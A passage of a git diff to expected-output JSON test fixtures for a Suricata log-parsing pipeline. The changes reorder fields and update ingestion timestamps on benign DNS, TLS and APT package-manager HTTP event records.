management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-backports\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2601},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":64,\"pkts_toclient\":67,\"bytes_toserver\":4895,\"bytes_toclient\":96554,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1419,7 +1419,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996705700Z", + "ingested": "2021-12-14T14:55:13.788112992Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.953886+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":3,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/main\\/source\\/by-hash\\/SHA256\\/65f2e3a4e9d89d9d4b5e3d42e586bc96f48a24466b0ad0b4a707255e44a26b03\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":91,\"pkts_toclient\":119,\"bytes_toserver\":6932,\"bytes_toclient\":174843,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1523,7 +1523,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996711700Z", + "ingested": "2021-12-14T14:55:13.788113354Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.250560+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":4,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/universe\\/source\\/by-hash\\/SHA256\\/56cfd9cc2efa61dff7428dddf921c3cd6047ab8e6484a7f1888e4c3f7252f1ef\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2688},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":159,\"pkts_toclient\":253,\"bytes_toserver\":11679,\"bytes_toclient\":376452,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1627,7 +1627,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996715200Z", + "ingested": "2021-12-14T14:55:13.788113707Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.401788+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":5,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/main\\/binary-amd64\\/by-hash\\/SHA256\\/4360137dc8f98b47648da1fef5472ef234fb02115bc2b29873bcaeee62637e70\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":190,\"pkts_toclient\":314,\"bytes_toserver\":13986,\"bytes_toclient\":468170,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1731,7 +1731,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996720200Z", + "ingested": "2021-12-14T14:55:13.788114137Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.776438+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":6,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/restricted\\/binary-amd64\\/by-hash\\/SHA256\\/c93fdc7f10cad1263349fd7b5bdd6a7f7163165b96ad263b3e12022e319d0d12\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2691},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":328,\"pkts_toclient\":588,\"bytes_toserver\":23361,\"bytes_toclient\":880323,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1835,7 +1835,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996725700Z", + "ingested": "2021-12-14T14:55:13.788114508Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.897009+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":7,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/universe\\/binary-amd64\\/by-hash\\/SHA256\\/5190f7afbee38b3cb32225db478fdbabd46f76eaa9c5921a13091891bf3e9bbc\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":330,\"pkts_toclient\":591,\"bytes_toserver\":23758,\"bytes_toclient\":884342,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1938,7 +1938,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996731200Z", + "ingested": "2021-12-14T14:55:13.788114871Z", "original": "{\"timestamp\":\"2018-10-04T09:35:01.362208+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":8,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/universe\\/i18n\\/by-hash\\/SHA256\\/9fe539b7036e51327cd85ca5e0a4dd4eb47f69168875de2ac9842a5e36ebd4a4\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":524,\"pkts_toclient\":979,\"bytes_toserver\":36819,\"bytes_toclient\":1467603,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -2041,7 +2041,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996735400Z", + "ingested": "2021-12-14T14:55:13.788115221Z", "original": "{\"timestamp\":\"2018-10-04T09:35:01.575088+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":9,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/multiverse\\/binary-amd64\\/by-hash\\/SHA256\\/8ab8cb220c0e50521c589acc2bc2b43a3121210f0b035a0605972bcffd73dd16\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":575,\"pkts_toclient\":1079,\"bytes_toserver\":40452,\"bytes_toclient\":1618380,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -2067,23 +2067,6 @@ } }, { - "destination": { - "port": 9080, - "address": "10.232.0.237", - "domain": "hostname.domain.net" - }, - "source": { - "port": 45884, - "address": "10.126.2.140", - "ip": "10.126.2.140" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "tls", - "transport": "tcp" - }, "@timestamp": "2018-10-04T09:35:02.796Z", "ecs": { "version": "1.12.0" @@ -2096,6 +2079,11 @@ "10.126.2.140" ] }, + "destination": { + "port": 9080, + "address": "10.232.0.237", + "domain": "hostname.domain.net" + }, "suricata": { "eve": { "in_iface": "enp5s0", @@ -2156,8 +2144,13 @@ "version": "1.2", "version_protocol": "tls" }, + "source": { + "port": 45884, + "address": "10.126.2.140", + "ip": "10.126.2.140" + }, "event": { - "ingested": "2021-12-09T13:45:19.996740100Z", + "ingested": "2021-12-14T14:55:13.788115574Z", "original": "{\"tls\":{\"ja3s\":{\"string\":\"333,55555,66666-22\",\"hash\":\"0993626a07ad09e1ce91293be7aa5721\"},\"ja3\":{\"string\":\"001,22222-33333-00-44444-66666-333-333-55555-55555-22-55555-44444-22-33-66666-77777-22-88888-99999-333-22-66666-77777-22-99999-96611-22-33-88888-33333-88888-333-22222-33333-333-222-88888-444-99999-22222-666-777-888,22-33-44-55-6,77-88-99-0-11-11-22-33-44-55,0\",\"hash\":\"d92325c876e7279f4eb8c62415e3a6b7\"},\"notafter\":\"2024-07-16T14:52:35\",\"notbefore\":\"2019-07-17T14:52:35\",\"version\":\"TLS 1.2\",\"sni\":\"hostname.domain.net\",\"fingerprint\":\"00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:00:11:22:33\",\"serial\":\"00:11:22:33:44:55:66:77:88\",\"issuerdn\":\"C=US, O=Google Inc, CN=Google Internet Authority G2\",\"subject\":\"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google.com\"},\"proto\":\"TCP\",\"dest_port\":9080,\"dest_ip\":\"10.232.0.237\",\"src_port\":45884,\"src_ip\":\"10.126.2.140\",\"event_type\":\"tls\",\"in_iface\":\"enp5s0\",\"flow_id\":1091813059495729,\"timestamp\":\"2018-10-04T09:35:02.796615+0000\"}", "category": [ "network" @@ -2167,6 +2160,13 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "tls", + "transport": "tcp" } }, { @@ -2284,7 +2284,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996745900Z", + "ingested": "2021-12-14T14:55:13.788116024Z", "original": "{\"flow\":{\"start\":\"2020-06-26T11:00:02.970011-0400\",\"bytes_toclient\":4660,\"bytes_toserver\":1074,\"pkts_toclient\":8,\"pkts_toserver\":7},\"app_proto\":\"tls\",\"tls\":{\"ja3s\":{\"string\":\"742,48172,30210-30\",\"hash\":\"391231ba5675e42807b9e1f457b2614e\"},\"ja3\":{\"string\":\"718,4682-2687-2686-41992-41911-53292-53297-41969-22905-41926-41924-94181-94711-15-23-95-12-11-205,0-33-50-53-6-61-39-23-34-85-81,93-04-52,3-9-3\",\"hash\":\"3f1ea03f5822e8021b60cc3e4b233181\"},\"notafter\":\"2026-06-25T17:36:29\",\"notbefore\":\"2016-06-27T17:36:29\",\"version\":\"TLS 1.2\",\"sni\":\"host.domain.net\",\"fingerprint\":\"36:3f:ee:2a:1c:fa:de:ad:be:ef:42:99:cf:a9:b0:91:01:eb:a9:cc\",\"serial\":\"72:A9:2C:51\",\"issuerdn\":\"C=Unknown, ST=Unknown, L=Unknown, O=Unknown, OU=Unknown, CN=Unknown\",\"subject\":\"C=Unknown, ST=Unknown, L=Unknown, O=Unknown, OU=Unknown, CN=Unknown\"},\"alert\":{\"severity\":3,\"category\":\"\",\"signature\":\"SURICATA TLS on unusual port\",\"rev\":1,\"signature_id\":2610003,\"gid\":1,\"action\":\"allowed\"},\"proto\":\"TCP\",\"dest_port\":8443,\"dest_ip\":\"10.128.2.48\",\"src_port\":64389,\"src_ip\":\"10.137.3.54\",\"event_type\":\"alert\",\"in_iface\":\"enp0s31f6\",\"flow_id\":991192778198299,\"timestamp\":\"2020-06-26T11:00:03.342282-0400\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json index 549717e5874..f5411b26e33 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json @@ -1,6 +1,15 @@ { "expected": [ { + "@timestamp": "2019-08-22T23:48:27.924Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" @@ -15,27 +24,6 @@ "type": "query", "id": "51803" }, - "source": { - "port": 46686, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:27.924Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -50,8 +38,13 @@ "flow_id": "885455453886936" } }, + "source": { + "port": 46686, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.597818200Z", + "ingested": "2021-12-14T14:55:20.366673060Z", "original": "{\"timestamp\":\"2019-08-22T23:48:27.924120+0000\",\"flow_id\":885455453886936,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":46686,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":51803,\"rrname\":\"google.com\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" @@ -61,9 +54,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-22T23:48:27.924Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" @@ -78,27 +87,6 @@ "type": "query", "id": "39523" }, - "source": { - "port": 36993, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:27.924Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -113,8 +101,13 @@ "flow_id": "1418448010418810" } }, + "source": { + "port": 36993, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.597827300Z", + "ingested": "2021-12-14T14:55:20.366674964Z", "original": "{\"timestamp\":\"2019-08-22T23:48:27.924282+0000\",\"flow_id\":1418448010418810,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":36993,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":39523,\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -124,9 +117,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-22T23:48:27.950Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "10.0.2.3" + ] + }, "destination": { "port": 36993, "address": "10.0.2.15" @@ -157,28 +167,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:27.950Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -193,8 +181,13 @@ "flow_id": "1418448010418810" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597894Z", + "ingested": "2021-12-14T14:55:20.366675361Z", "original": "{\"timestamp\":\"2019-08-22T23:48:27.950946+0000\",\"flow_id\":1418448010418810,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":36993,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":39523,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"ttl\":272,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}],\"grouped\":{\"AAAA\":[\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"]}}}", "category": [ "network" @@ -204,9 +197,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-22T23:48:27.957Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1", + "10.0.2.3" + ] + }, "destination": { "port": 46686, "address": "10.0.2.15" @@ -237,28 +247,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:27.957Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -273,8 +261,13 @@ "flow_id": "885455453886936" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597898300Z", + "ingested": "2021-12-14T14:55:20.366675720Z", "original": "{\"timestamp\":\"2019-08-22T23:48:27.957906+0000\",\"flow_id\":885455453886936,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":46686,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":51803,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"google.com\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"google.com\",\"rrtype\":\"A\",\"ttl\":299,\"rdata\":\"175.16.199.1\"}],\"grouped\":{\"A\":[\"175.16.199.1\"]}}}", "category": [ "network" @@ -284,9 +277,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-22T23:48:48.839Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" @@ -302,27 +311,6 @@ "type": "query", "id": "60273" }, - "source": { - "port": 50720, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:48.839Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -337,8 +325,13 @@ "flow_id": "40074894954311" } }, + "source": { + "port": 50720, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.597902800Z", + "ingested": "2021-12-14T14:55:20.366676101Z", "original": "{\"timestamp\":\"2019-08-22T23:48:48.839495+0000\",\"flow_id\":40074894954311,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":50720,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":60273,\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" @@ -348,9 +341,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-22T23:48:48.839Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" @@ -366,27 +375,6 @@ "type": "query", "id": "4210" }, - "source": { - "port": 41979, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:48.839Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -401,8 +389,13 @@ "flow_id": "2130691028471842" } }, + "source": { + "port": 41979, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.597914700Z", + "ingested": "2021-12-14T14:55:20.366676457Z", "original": "{\"timestamp\":\"2019-08-22T23:48:48.839714+0000\",\"flow_id\":2130691028471842,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":41979,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":4210,\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -412,9 +405,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-22T23:48:48.901Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1", + "10.0.2.3" + ] + }, "destination": { "port": 50720, "address": "10.0.2.15" @@ -473,28 +483,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:48.901Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -509,8 +497,13 @@ "flow_id": "40074894954311" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597919500Z", + "ingested": "2021-12-14T14:55:20.366676820Z", "original": "{\"timestamp\":\"2019-08-22T23:48:48.901548+0000\",\"flow_id\":40074894954311,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":50720,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":60273,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":270,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"}],\"grouped\":{\"A\":[\"175.16.199.1\",\"175.16.199.1\",\"175.16.199.1\",\"175.16.199.1\"],\"CNAME\":[\"dualstack.r2.shared.global.fastly.net\"]}}}", "category": [ "network" @@ -520,9 +513,28 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-22T23:48:48.902Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "2a04:4e42:0200:0000:0000:0000:0000:0729", + "2a04:4e42:0400:0000:0000:0000:0000:0729", + "10.0.2.3" + ] + }, "destination": { "port": 41979, "address": "10.0.2.15" @@ -581,30 +593,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:48.902Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "2a04:4e42:0200:0000:0000:0000:0000:0729", - "2a04:4e42:0400:0000:0000:0000:0000:0729", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -619,8 +607,13 @@ "flow_id": "2130691028471842" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597924700Z", + "ingested": "2021-12-14T14:55:20.366677201Z", "original": 